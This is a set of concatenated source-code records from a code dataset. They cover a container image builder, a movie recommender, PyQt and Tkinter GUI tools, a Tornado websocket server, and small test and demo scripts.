All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A binary for constructing images from a source context.\"\"\"\n\nimport argparse\nimport sys\nimport tarfile\nfrom containerregistry.client import docker_creds\nfrom containerregistry.client import docker_name\nfrom containerregistry.client.v2_2 import append\nfrom containerregistry.client.v2_2 import docker_image\nfrom containerregistry.client.v2_2 import docker_session\nfrom containerregistry.client.v2_2 import save\nfrom containerregistry.tools import patched\nfrom containerregistry.transport import transport_pool\n\n\nimport httplib2\nimport logging\n\nfrom ftl.common import cache\nfrom ftl.common import context\n\nfrom ftl.node import builder\n\n_THREADS = 32\n_LEVEL_MAP = {\n \"NOTSET\": logging.NOTSET,\n \"DEBUG\": logging.DEBUG,\n \"INFO\": logging.INFO,\n \"WARNING\": logging.WARNING,\n \"ERROR\": logging.ERROR,\n \"CRITICAL\": logging.CRITICAL,\n}\n\nparser = argparse.ArgumentParser(\n description='Construct node images from source.')\n\nparser.add_argument(\n '--base',\n action='store',\n required=True,\n help=('The name of the docker base image.'))\n\nparser.add_argument(\n '--name',\n required=True,\n action='store',\n help=('The name of the docker image to push.'))\n\nparser.add_argument(\n '--directory',\n required=True,\n action='store',\n help='The path where the application data sits.')\n\nparser.add_argument(\n '--no-cache',\n dest='cache',\n action='store_false',\n help='Do not use cache during build.')\n\nparser.add_argument(\n '--cache',\n dest='cache',\n default=True,\n action='store_true',\n help='Use cache during build (default).')\n\nparser.add_argument(\n '--output-path',\n dest='output_path',\n action='store',\n help='Store final image as local tarball at output path \\\n instead of pushing to registry')\n\nparser.add_argument(\n \"-v\",\n \"--verbosity\",\n default=\"NOTSET\",\n nargs=\"?\",\n action='store',\n choices=_LEVEL_MAP.keys())\n\n\ndef main(args):\n args = parser.parse_args(args)\n logging.getLogger().setLevel(_LEVEL_MAP[args.verbosity])\n logging.basicConfig(\n format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d,%H:%M:%S')\n transport = transport_pool.Http(httplib2.Http, size=_THREADS)\n\n # TODO(mattmoor): Support digest base images.\n base_name = docker_name.Tag(args.base)\n base_creds = docker_creds.DefaultKeychain.Resolve(base_name)\n\n target_image = docker_name.Tag(args.name)\n target_creds = docker_creds.DefaultKeychain.Resolve(target_image)\n\n ctx = context.Workspace(args.directory)\n cash = cache.Registry(\n target_image.as_repository(),\n target_creds,\n transport,\n threads=_THREADS,\n mount=[base_name])\n bldr = builder.From(ctx)\n with docker_image.FromRegistry(base_name, base_creds,\n transport) as base_image:\n\n # Create (or pull from cache) the base image with the\n # package descriptor installation overlaid.\n logging.info('Generating dependency layer...')\n with bldr.CreatePackageBase(base_image, cash, args.cache) as deps:\n 
# Construct the application layer from the context.\n            logging.info('Generating app layer...')\n            app_layer, diff_id = bldr.BuildAppLayer()\n            with append.Layer(deps, app_layer, diff_id=diff_id) as app_image:\n                if args.output_path:\n                    with tarfile.open(name=args.output_path, mode='w') as tar:\n                        save.tarball(target_image, app_image, tar)\n                    logging.info(\"{0} tarball located at {1}\".format(\n                        str(target_image), args.output_path))\n                    return\n                with docker_session.Push(\n                        target_image,\n                        target_creds,\n                        transport,\n                        threads=_THREADS,\n                        mount=[base_name]) as session:\n                    logging.info('Pushing final image...')\n                    session.upload(app_image)\n\n\nif __name__ == '__main__':\n    with patched.Httplib2():\n        main(sys.argv[1:])\n","sub_path":"ftl/node/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"393594075","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 29 14:22:09 2020\n\n@author: A\n\"\"\"\n#%%\n# Movie recommendation model (content-based filtering)\n# features: genres, rating, vote count\nimport pandas as pd\nimport numpy as np\n\nmovies = pd.read_csv('tmdb_5000_movies.csv')\n\nmovies.info()\nmovies.head(1)\n#print(movies.shape)\n\n'''\n\t237000000\t[{\"id\": 28, \"name\": \"Action\"}, {\"id\": 12, \"nam...\thttp://www.avatarmovie.com/\t19995\t[{\"id\": 1463, \"name\": \"culture clash\"}, {\"id\":...\ten\tAvatar\tIn the 22nd century, a paraplegic Marine is di...\t150.437577\t[{\"name\": \"Ingenious Film Partners\", \"id\": 289...\t[{\"iso_3166_1\": \"US\", \"name\": \"United States o...\t2009-12-10\t2787965087\t162.0\t[{\"iso_639_1\": \"en\", \"name\": \"English\"}, {\"iso...\tReleased\tEnter the World of Pandora.\tAvatar\t7.2\t11800\n'''\nmovies_df = movies[['id','title', 'genres', 'vote_average', 'vote_count',\n                    'popularity', 'keywords', 'overview']]\n\npd.set_option('max_colwidth', 500) # widen the column display so the console shows full values\nmovies_df[['genres','keywords']][:1]\n\n\nfrom ast import literal_eval\n\nl = '[{\"name\": \"Adventure\"}]'\ntype(l)\nlst = literal_eval(l) # literal_eval parses the string into actual Python objects\ntype(lst)\nlst[0]\n\nmovies_df['genres'] = movies_df['genres'].apply(literal_eval)\nmovies_df['keywords'] = movies_df['keywords'].apply(literal_eval)\n\n\n# x -> movies_df['genres'],\n# y -> {\"id\": 28, \"name\": \"Action\"}\nmovies_df['genres'] = movies_df['genres'].apply(lambda x : [ y['name'] for y in x]) # keep every genre name of the movie\nmovies_df['keywords'] = movies_df['keywords'].apply(lambda x : [ y['name'] for y in x])\nmovies_df[['genres', 'keywords']][:1]\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n# To apply CountVectorizer, join each movie's genre list into one space-separated string.
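\n# NOTE: with ngram_range=(1,2), a string like 'Action Adventure Fantasy' produces the\n# unigrams 'action', 'adventure', 'fantasy' plus the bigrams 'action adventure' and\n# 'adventure fantasy', so frequent genre pairs also become countable features.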
\nmovies_df['genres_literal'] = movies_df['genres'].apply(lambda x : (' ').join(x)) # join each genre list into a single string\n# count_vect counts genre-name tokens per movie\ncount_vect = CountVectorizer(min_df=0, ngram_range=(1,2)) # genres are unique, so min_df=0\ngenre_mat = count_vect.fit_transform(movies_df['genres_literal'])\nprint(genre_mat.toarray())\nprint(genre_mat.shape)\n\n# cosine-similarity matrix between every movie's genre vector and every other movie's\nfrom sklearn.metrics.pairwise import cosine_similarity\ngenre_sim = cosine_similarity(genre_mat, genre_mat)\nprint(genre_sim.shape) # compared against all movies, so the shape is (4803, 4803)\nprint(genre_sim[:2])
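\n\n# NOTE: for two count vectors a and b, cosine similarity is\n# np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b));\n# cosine_similarity(genre_mat, genre_mat) simply evaluates that for every pair of rows.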
\n\n# sorting example\n'''\ntest = [4, 1, 6, 19, 12, 39, 55, 13]\nnp.sort(test)[::-1] # np.sort(arr)[::-1] sorts in descending order\n'''\n\n# genre_sim_sorted_ind: for each movie, the row indexes of genre_sim ordered by\n# similarity in descending order (argsort()[:, ::-1])\ngenre_sim_sorted_ind = genre_sim.argsort()[:, ::-1]\nprint(genre_sim_sorted_ind[:1])\n\ndef find_sim_movie(df, sorted_ind, title_name, top_n=10):\n\n    # extract the rows of movies_df whose 'title' column equals title_name\n    title_movie = df[df['title'] == title_name]\n\n    # get the index of the matching rows as an ndarray, then pull the top_n\n    # most similar indexes out of sorted_ind (the genre_sim_sorted_ind argument)\n    title_index = title_movie.index.values\n    similar_indexes = sorted_ind[title_index, :(top_n)]\n\n    # the extracted top_n indexes are 2-D; flatten to a 1-D array so they can\n    # be used to index the DataFrame\n    print(similar_indexes)\n    similar_indexes = similar_indexes.reshape(-1)\n\n    return df.iloc[similar_indexes]\n\n# the genres are similar, but the recommended movies lack mainstream appeal\nsimilar_movies = find_sim_movie(movies_df, genre_sim_sorted_ind, 'The Godfather',10)\nsimilar_movies[['title', 'vote_average']]\n'''\n\ttitle\tvote_average\n2731\tThe Godfather: Part II\t8.3\n1243\tMean Streets\t7.2\n3636\tLight Sleeper\t5.7\n1946\tThe Bad Lieutenant: Port of Call - New Orleans\t6.0\n2640\tThings to Do in Denver When You're Dead\t6.7\n4065\tMi America\t0.0\n1847\tGoodFellas\t8.2\n4217\tKids\t6.8\n883\tCatch Me If You Can\t7.7\n3866\tCity of God\t8.1\n'''\n\n# top 10 by raw rating - the scores are high but vote_count is tiny, so they are not objective\nmovies_df[['title','vote_average','vote_count']].sort_values('vote_average', ascending=False)[:10]\n'''\n\ntitle\tvote_average\tvote_count\n3519\tStiff Upper Lips\t10.0\t1\n4247\tMe You and Five Bucks\t10.0\t2\n4045\tDancer, Texas Pop. 81\t10.0\t1\n4662\tLittle Big Top\t10.0\t1\n3992\tSardaarji\t9.5\t2\n2386\tOne Man's Hero\t9.3\t2\n2970\tThere Goes My Baby\t8.5\t2\n1881\tThe Shawshank Redemption\t8.5\t8205\n2796\tThe Prisoner of Zenda\t8.4\t11\n3337\tThe Godfather\t8.4\t5893\n'''\n\n'''\nWeighted Rating = (v/(v+m)) * R + (m/(v+m)) * C\nv: number of votes cast for the individual movie\nm: minimum number of votes required to be counted\nR: average rating of the individual movie\nC: mean rating across all movies\n'''\n# weighted-rating scheme\nC = movies_df['vote_average'].mean() # mean rating over all movies\nm = movies_df['vote_count'].quantile(0.6) # vote-count threshold: the higher it is, the more the weighting favors heavily-voted movies\nprint('C:',round(C,3), 'm:',round(m,3))\n\npercentile = 0.6\nm = movies_df['vote_count'].quantile(percentile)\nC = movies_df['vote_average'].mean()\n\ndef weighted_vote_average(record):\n    v = record['vote_count']\n    R = record['vote_average']\n\n    return ( (v/(v+m)) * R ) + ( (m/(m+v)) * C )\n\nmovies_df['weighted_vote'] = movies_df.apply(weighted_vote_average, axis=1)\n
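\n# Worked example (illustrative numbers, not taken from the dataset): with C = 6.0 and\n# m = 370, a movie with v = 8205 votes and R = 8.5 gets\n# (8205/8575) * 8.5 + (370/8575) * 6.0 = 8.13 + 0.26 = 8.39,\n# i.e. raw ratings are pulled toward the global mean when the vote count is small.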
\n\nmovies_df[['title','vote_average','weighted_vote','vote_count']].sort_values('weighted_vote',\n                                                                              ascending=False)[:10]\n\n'''\n\ttitle\tvote_average\tweighted_vote\tvote_count\n1881\tThe Shawshank Redemption\t8.5\t8.396052\t8205\n3337\tThe Godfather\t8.4\t8.263591\t5893\n662\tFight Club\t8.3\t8.216455\t9413\n3232\tPulp Fiction\t8.3\t8.207102\t8428\n65\tThe Dark Knight\t8.2\t8.136930\t12002\n1818\tSchindler's List\t8.3\t8.126069\t4329\n3865\tWhiplash\t8.3\t8.123248\t4254\n809\tForrest Gump\t8.2\t8.105954\t7927\n2294\tSpirited Away\t8.3\t8.105867\t3840\n2731\tThe Godfather: Part II\t8.3\t8.079586\t3338\n'''\n\ndef find_sim_movie(df, sorted_ind, title_name, top_n=10):\n    title_movie = df[df['title'] == title_name] # use the movie with the given title as the baseline\n    title_index = title_movie.index.values # fetch the baseline movie's index\n\n    # pull 2x top_n genre-similar indexes so there is headroom to drop low-rated candidates\n    similar_indexes = sorted_ind[title_index, :(top_n*2)]\n    similar_indexes = similar_indexes.reshape(-1)\n    # exclude the baseline movie's own index\n    similar_indexes = similar_indexes[similar_indexes != title_index]\n\n    # from the 2x top_n candidate pool, keep the top_n with the highest weighted_vote\n    return df.iloc[similar_indexes].sort_values('weighted_vote', ascending=False)[:top_n]\n\nsimilar_movies = find_sim_movie(movies_df, genre_sim_sorted_ind, 'The Godfather',10)\nsimilar_movies[['title', 'vote_average', 'weighted_vote']]\n\n'''\n\ttitle\tvote_average\tweighted_vote\n2731\tThe Godfather: Part II\t8.3\t8.079586\n1847\tGoodFellas\t8.2\t7.976937\n3866\tCity of God\t8.1\t7.759693\n1663\tOnce Upon a Time in America\t8.2\t7.657811\n883\tCatch Me If You Can\t7.7\t7.557097\n281\tAmerican Gangster\t7.4\t7.141396\n4041\tThis Is England\t7.4\t6.739664\n1149\tAmerican Hustle\t6.8\t6.717525\n1243\tMean Streets\t7.2\t6.626569\n2839\tRounders\t6.9\t6.530427\n'''\n\n","sub_path":"contents_filter_test.py","file_name":"contents_filter_test.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"479226151","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QSlider, QLabel\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtGui\n\n\ndef debugging_slider():\n    mydebug = DebbugingSlider()\n    return mydebug\n\n\nclass DebbugingSlider(QtWidgets.QMainWindow):\n\n    def __init__(self, *args, **kwargs):\n        super(DebbugingSlider, self).__init__(*args, **kwargs)\n\n        self.name_value_dict = {}\n        self.label_keys = []\n        self.name_range = 4\n        self.idx = 0\n        \"\"\"\n        if( custom_name_list ):\n            self.name_range = len(custom_name_list)\n            for name in custom_name_list:\n                self.label_keys.append(name)\n        else :\n        \"\"\"\n        self.label_keys = [\" Encoder Rotation Scalar \",\n                           \" BPM \",\n                           \"OTHER3\",\"OTHER4\",\"OTHER5\",\"OTHER6\",\"OTHER7\",\"OTHER8\"]\n        #app = QApplication(sys.argv)\n        #window = QWidget()\n        vbox = QVBoxLayout()\n\n        self.make_slider( self , vbox )\n        # a QMainWindow needs a central widget; calling setLayout() on it directly has no effect\n        central = QWidget()\n        central.setLayout(vbox)\n        self.setCentralWidget(central)\n        self.setGeometry(50,50,320,200)\n        self.setWindowTitle(\"Parameter tuning\")\n        self.show()\n        #sys.exit(app.exec_())\n\n    def get_value( self, key_name ):\n        \"\"\"Get Slider Value Helper function\"\"\"\n        return self.name_value_dict[ key_name ]\n\n    def change_value( self, widget_dict ):\n        \"\"\"Slot function.\"\"\"\n        widget_dict[\"value_label\"].setText(str(widget_dict[\"slider\"].value()))\n        # key by the label's text so get_value(key_name) can look it up again\n        self.name_value_dict[ widget_dict[\"name_label\"].text() ] = widget_dict[\"slider\"].value()\n\n    def make_slider( self, win , vbox , count = 1 ):\n        \"\"\"Slider + text constructor.\"\"\"\n        start_val = 0\n        # make text display\n        name_label = QLabel( self.label_keys[self.idx])\n        value_label = QLabel(str(start_val))\n        value_label.setFont(QtGui.QFont(\"Sanserif\", 15))\n        vbox.setAlignment(Qt.AlignCenter)\n\n        # make slider\n        mySlider = QSlider(Qt.Horizontal,win)\n        mySlider.setTickPosition(QSlider.TicksBelow)\n        mySlider.setTickInterval( 1 )\n        mySlider.setMinimum(0)\n        mySlider.setMaximum(10)\n        mySlider.setOrientation(Qt.Horizontal)\n\n        # add widgets\n        vbox.addWidget(name_label)\n        vbox.addWidget(value_label)\n        vbox.addWidget(mySlider)\n\n        # object retrieval\n        self.name_value_dict[ self.label_keys[self.idx] ] = start_val\n        widget_dict = {\"slider\" :mySlider , \"value_label\":value_label ,\"name_label\":name_label}\n        mySlider.valueChanged[int].connect( lambda: self.change_value(widget_dict) )\n        self.idx += 1\n\n\nif __name__ == '__main__':\n    # a QApplication must exist before any QWidget is constructed\n    app = QApplication(sys.argv)\n    window = DebbugingSlider()\n    sys.exit(app.exec_())\n","sub_path":"software/control_system/gui/slider.py","file_name":"slider.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"639886340","text":"import json\n#from json2html import json2html\nimport requests\n\nAPI_KEY = 'eyJhbGciOiJIUzUxMiIsImlhdCI6MTU0NDA5ODM0MCwiZXhwIjoxNTc1NjM0MzQwfQ.eyJ1c2VybmFtZSI6ImRvc2llIn0.MTOjvlD5QRRk1ZRp9zzT0G0_G6KJqAsl8dnnJU38_Qn99ufFe92Bsz89iYudYtZzGUib_QMKnTV3QNa7Sahsyg'\nBASE_URL = 'https://localhost:5002/absapi/v1/'\n\ndef getffullcusinfo():\n    url = BASE_URL+'cus/222512'\n    headers = {\"Authorization\": \"Bearer %s\" % API_KEY,\n               \"Content-Type\": \"application/json\",\n               \"Accept\": \"application/json\",\n               }\n\n    data = None # ensure the return below is defined even when the request fails\n    try:\n        res = requests.get(url, headers=headers, verify=False)\n        data = res.json()\n\n        print(json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False))\n        print(json.dumps(data))\n        print(data)\n        # print(json2html.convert(json=data))\n\n    except Exception as e:\n        print(\"Exception (getfromapi):\", e)\n\n    return data\n\ngetffullcusinfo()","sub_path":"test/test_cus.py","file_name":"test_cus.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"317738644","text":"\"\"\"The solution in this case is about using list comprehensions to make the code\nmore efficient and simple\"\"\"\n\n\nX = int(input(\"What is the maximal length of the triangle side? 
Enter a number: \"))\n\nsolutions = [[x, y, z] for x in range(5, X) for y in range(4, X) for z in range(3, X) if (x*x==y*y+z*z)]\n\nmaximum = 0\nmaximum = max([max(solution) for solution in solutions if maximum < max(solution)])\n\nprint(f\"The longest side possible is {maximum}\")","sub_path":"your-code/challenge-3.py","file_name":"challenge-3.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62182026","text":"import sys\nimport time\nimport traceback\n\nimport tornado\nimport tornado.web\nimport tornado.ioloop\nimport tornado.websocket\nfrom tornado import gen\n\nfrom webalchemy.remotedocument import remotedocument\nfrom webalchemy.utils import log\n\n\n\n\nmain_html='''\n\n\n\n\n\n \n'''\n\n \n\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def initialize(self, port):\n log('Initiallizing new app!')\n self.main_html= main_html.replace('PORT',str(port)) \n @gen.coroutine\n def get(self):\n self.write(self.main_html)\n \n\n\n\nclass WebSocketHandler(tornado.websocket.WebSocketHandler):\n @gen.coroutine\n def initialize(self, local_doc, shared_wshandlers):\n log('Initiallizing new documet!')\n self.remotedocument= remotedocument()\n self.sharedhandlers= shared_wshandlers\n self.local_doc= local_doc()\n self.local_doc_initialized= False\n self.sharedhandlers.append(self)\n\n @gen.coroutine\n def open(self):\n log('WebSocket opened')\n\n @gen.coroutine\n def on_message(self, message):\n log('message received:\\n'+message)\n try:\n if not self.local_doc_initialized:\n log('Initializing local document with message...')\n yield self.local_doc.initialize(self.remotedocument,self, message)\n self.local_doc_initialized= True\n else:\n log('passing message to document...')\n yield self.local_doc.inmessage(message)\n yield self.flush_dom()\n except:\n log('Failed handling message. Exception:')\n traceback.print_exc(file=sys.stdout)\n sys.stdout.flush() \n @gen.coroutine\n def flush_dom(self):\n code= self.remotedocument.pop_all_code()\n if code!='':\n log('sending message:\\n'+code)\n # this is good to simulate latency\n #yield async_delay(2)\n self.write_message(code)\n else:\n log('**NOTHING**')\n @gen.coroutine\n def msg_in_proc(self,msg,send_to_self=False):\n log('sending message to all '+str(len(self.sharedhandlers))+' documents in process:')\n log(msg)\n for h in self.sharedhandlers:\n if h.local_doc is not self.local_doc or send_to_self:\n try:\n yield h.local_doc.outmessage(msg,self.local_doc)\n yield h.flush_dom()\n except:\n log('Failed handling outmessage. Exception:')\n traceback.print_exc(file=sys.stdout)\n sys.stdout.flush()\n @gen.coroutine\n def on_close(self):\n log('WebSocket closed')\n log('Removing shared doc')\n self.sharedhandlers.remove(self)\n log('Calling local document on_close:')\n try:\n yield self.local_doc.onclose()\n except:\n log('Failed handling local document onclose. 
\n    @gen.coroutine\n    def msg_in_proc(self,msg,send_to_self=False):\n        log('sending message to all '+str(len(self.sharedhandlers))+' documents in process:')\n        log(msg)\n        for h in self.sharedhandlers:\n            if h.local_doc is not self.local_doc or send_to_self:\n                try:\n                    yield h.local_doc.outmessage(msg,self.local_doc)\n                    yield h.flush_dom()\n                except:\n                    log('Failed handling outmessage. Exception:')\n                    traceback.print_exc(file=sys.stdout)\n                    sys.stdout.flush()\n    @gen.coroutine\n    def on_close(self):\n        log('WebSocket closed')\n        log('Removing shared doc')\n        self.sharedhandlers.remove(self)\n        log('Calling local document on_close:')\n        try:\n            yield self.local_doc.onclose()\n        except:\n            log('Failed handling local document onclose. Exception:')\n            traceback.print_exc(file=sys.stdout)\n            sys.stdout.flush()\n\n\n\n\n@gen.coroutine\ndef async_delay(secs):\n    yield gen.Task(tornado.ioloop.IOLoop.instance().add_timeout, time.time() + secs)\n\n\n\n\ndef run(port,local_doc):\n    shared_wshandlers= []\n    application = tornado.web.Application([\n        (r'/', MainHandler, dict(port=port)),\n        (r'/websocket', WebSocketHandler, dict(local_doc=local_doc, shared_wshandlers=shared_wshandlers)),\n    ])\n    application.listen(port)\n    tornado.ioloop.IOLoop.instance().start()\n","sub_path":"webalchemy/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"21799803","text":"# -*- coding:utf-8 -*-\n# @Desc :\n# @Author : Administrator\n# @Date : 2019-07-31 16:02\n\nimport logging\n\n# log level hierarchy: critical > error > warning > info > debug > notset\n# default log level: warning\n# default log format: level, output destination, ...\n\n# configure log output and format in one call\n# logging.basicConfig(\n#     # set the log level\n#     level = logging.DEBUG,\n#     # choose the output (file or console)\n#     filename = \"logger.log\", # file output; appends by default\n#     # file open mode (w = overwrite)\n#     filemode = \"w\",\n#     # message format\n#     format = \"%(asctime)s [%(lineno)d] %(message)s\"\n#\n# )\n#\n# logging.debug(\"debug message\")\n# logging.info(\"info message\")\n# logging.warning(\"warning message\")\n# logging.error(\"error message\")\n# logging.critical(\"critical message\")\n\n### use a logger object to send log records both to the console and to a file\nlogger = logging.getLogger()\n\n# handlers: one writes to a file, the other to the console\nfh = logging.FileHandler(\"logger.log\")\nch = logging.StreamHandler()\n\n# define the output format\nfm = logging.Formatter(\"%(asctime)s %(message)s\")\n\nfh.setFormatter(fm)\nch.setFormatter(fm)\n\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n# set the logger's output level\nlogger.setLevel(\"DEBUG\")\n\nlogger.debug(\"logger debug message\")\nlogger.info(\"logger info message\")\nlogger.warning(\"logger warning message\")\nlogger.error(\"logger error message\")\nlogger.critical(\"logger critical message\")\n
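\n# NOTE: the logger's level filters records first; each handler can then filter further\n# with its own setLevel() (e.g. fh.setLevel(logging.WARNING) keeps the file quieter\n# than the console).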
\n\n","sub_path":"[06]Python-内置函数与模块/Python内置模块部分/07内置模块-logging.py","file_name":"07内置模块-logging.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"582134993","text":"import pytest\n\nfrom utils.process import run, silent_run, RunError\nfrom utils.fs import in_temp_dir\n\n\ndef test_run(capsys):\n    with in_temp_dir():\n        assert run('echo hello > hello.txt; echo world >> hello.txt', shell=True)\n\n        out = run('ls', return_output=True)\n        assert out == 'hello.txt\\n'\n\n        out = run(['cat', 'hello.txt'], return_output=True)\n        assert out == 'hello\\nworld\\n'\n\n        with pytest.raises(RunError):\n            run('blah')\n\n        assert not run('blah', raises=False)\n\n        assert silent_run('ls -l')\n        out, _ = capsys.readouterr()\n        assert out == ''\n","sub_path":"tests/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"224538971","text":"import threading\nimport time\nimport tkinter.filedialog\nfrom tkinter import *\nimport tkinter.messagebox\nfrom PIL import Image, ImageTk\nimport cilent_recv_file\nimport file_client\nimport session\nimport rsa\n\n\nclass chat():\n    def send_friend(self):\n        message = self.textpad.get(1.0, END)\n        self.textpad.delete(1.0, END) # clear the input box\n\n        # show the outgoing message with a red name/timestamp\n\n        self.show_message.tag_config('red', background='red')\n\n        self.show_message.config(state=NORMAL)\n        self.show_message.insert(self.mark, self.my_name + ' ', 'red')\n        self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'red')\n        self.show_message.insert(self.mark, message + '\\n\\n')\n        self.show_message.config(state=DISABLED)\n\n        try:\n            # encrypt with the public key; RSA can only encrypt bytes\n            message = str(session.FRIEND_ID) + ':' + message\n            crypto = rsa.encrypt(message.encode('utf-8'), session.pubkey)\n            session.chat_tcpCliSock.send(crypto)\n        except Exception as e:\n            print(e)\n            tkinter.messagebox.showerror('错误', '发送消息失败')\n\n    def receive_message(self):\n        while True:\n            try:\n                message = session.chat_tcpCliSock.recv(1024) # the received payload is ciphertext\n                #message = rsa.decrypt(crypto, session.privatekey) # bytes\n                print(message.decode('utf-8').split('-')[0])\n                print(message.decode('utf-8').split('-')[-1])\n\n                if not message:\n                    break\n\n                # elif message.decode('utf-8').split('/')[0] == 'emoji:..': # received an image\n                #     file = message.decode('utf-8').split('-')[-1] # file path\n                #     print(file)\n\n                elif message.decode('utf-8').split('-')[0] == 'emoji':\n                    file = message.decode('utf-8').split('-')[-1]\n                    try:\n                        self.show_message.config(state=NORMAL)\n                        #self.textpad.tag_config(self.time_color_green, background='green')\n                        self.show_message.tag_config('green', background='green')\n                        self.show_message.insert(self.mark, self.friend_name + ' ', 'green')\n                        self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'green')\n                        _emoji = ImageTk.PhotoImage(Image.open(file))\n                        self.show_message.image_create(self.mark, image=_emoji)\n                        self.show_message.insert(self.mark, '\\n\\n', 'time_color')\n                        self.show_message.config(state=DISABLED)\n                    except Exception as e:\n                        print(e)\n                        print('显示表情出错')\n\n\n                else: # a plain text message arrived; display it here\n                    print(message.decode('utf-8'))\n                    self.show_message.config(state=NORMAL)\n                    self.show_message.tag_config('green', background='green')\n                    self.show_message.insert(self.mark, self.friend_name + ' ', 'green')\n                    self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'green')\n                    self.show_message.insert(self.mark, message.decode('utf-8') + '\\n\\n')\n\n                    self.show_message.config(state=DISABLED)\n\n            except:\n                print('与服务器的连接已断开')\n                time.sleep(3)\n                break\n\n\n    def send_file(self):\n        try:\n            filename = tkinter.filedialog.askopenfile() # defaultextension='.txt'\n            # file_name = os.path.basename(file_path)\n            print(filename.name)\n\n\n            file_client.send_file(filename.name, session.file_tcpCliSock)\n            self.show_message.insert(self.mark, self.my_name + ' ')\n            self.show_message.insert(self.mark, '[' + time.strftime('%H:%M:%S', time.localtime()) + '] ', 'time_color_red')\n            self.show_message.insert(self.mark, \"\\\"\" + str(filename.name) + \"\\\"\" + '文件已成功发送')\n        except:\n            pass\n\n\n    def receive_file(self):\n        if cilent_recv_file.recv(): # the return value is the file name\n            self.show_message.insert(self.mark, \"接收到文件:\" + str(cilent_recv_file.recv()))\n\n    def emoji(self):\n        # grab the current cursor position and insert the image there\n        # this statement can insert an image but cannot obtain 'current':\n        # button = Button(top, image=photo1, command=lambda: print(self.textpad.image_create('mark', image=photo1)))\n\n        top = Toplevel()\n\n        def send_emoji(photo):\n            # build the outgoing message\n            text = 'emoji-' + photo\n            try:\n                text = rsa.encrypt((session.FRIEND_ID + ':' + text).encode('utf-8'), session.pubkey)\n                session.chat_tcpCliSock.send(text)\n            except:\n                print('表情发送失败')
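\n        # NOTE: when building widgets in a loop, bind the loop variable as a default\n        # argument (command=lambda p=path: send_emoji(p)); a bare lambda would late-bind\n        # and every button would end up sending the last emoji in the loop.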
\n        # one button per emoji image: files a1..a12, b1..b12 and c1..c12, laid out on\n        # grid rows 0..2, columns 1..12\n        for row, prefix in enumerate(('a', 'b', 'c')):\n            for col in range(1, 13):\n                path = self.rootdir + '{}{}.png'.format(prefix, col)\n                photo = ImageTk.PhotoImage(Image.open(path))\n                button = Button(top, image=photo, command=lambda p=path: send_emoji(p))\n                button.image = photo # keep a reference so the image is not garbage-collected\n                button.grid(row=row, column=col)\n\n        top.mainloop()\n\n\n    def __init__(self):\n        #self.rootdir ='e:/python/chatroomforgit/emoji_file/'\n        self.friend_name = session.FRIEND_NAME\n        self.my_name = session.USER_NAME\n\n        self.rootdir = '../emoji_file/'\n        self.time_color_green = 'time_color_green'\n        self.time_color_red = 'time_color_red'\n\n\n        # send the first message to the server, formatted as userid:friendid\n        # userid_friendid = session.USER_ID + ':' + session.FRIEND_ID\n        # try:\n        #     session.chat_tcpCliSock.send(userid_friendid.encode('utf-8'))\n        #     session.file_tcpCliSock.send(userid_friendid.encode('utf-8'))\n        # except Exception as e:\n        #     print(e)\n        #     print('发送好友名称出错')\n\n        # start the thread that receives incoming messages\n        self.thread_receive = threading.Thread(target=self.receive_message, args=(), name=session.FRIEND_NAME)\n        self.thread_receive.start()\n\n        self.root = Toplevel()\n        self.root.geometry('600x450+450+250')\n        self.root.title(session.FRIEND_NAME)\n\n        # top - friend info\n        self.label_info = Label(self.root, text='个人信息', relief=SUNKEN, anchor=W, bd=1) # W = west (left) alignment; bd = border width\n        self.label_info.pack(side=TOP, fill=X, ipady=20)\n\n        # middle - chat history box\n        self.frame = Frame(self.root, bg='green')\n        self.frame.pack(side=TOP, fill=X, ipady=50)\n\n        self.show_message = Text(self.frame, bd=1, height=10)\n        # self.show_message.config(state=DISABLED) # enable this only after the inserts are wired up\n        self.show_message.pack(fill=BOTH, expand=1)\n        self.mark = 'mark'\n        self.show_message.mark_set(self.mark, CURRENT + ' lineend')\n\n        # bottom - input area\n        self.frame_buttom = Frame(self.root, bg='black')\n        self.frame_buttom.pack(side=BOTTOM, fill=BOTH, ipady=30)\n\n        # emoji / file toolbar\n        self.lable_function = 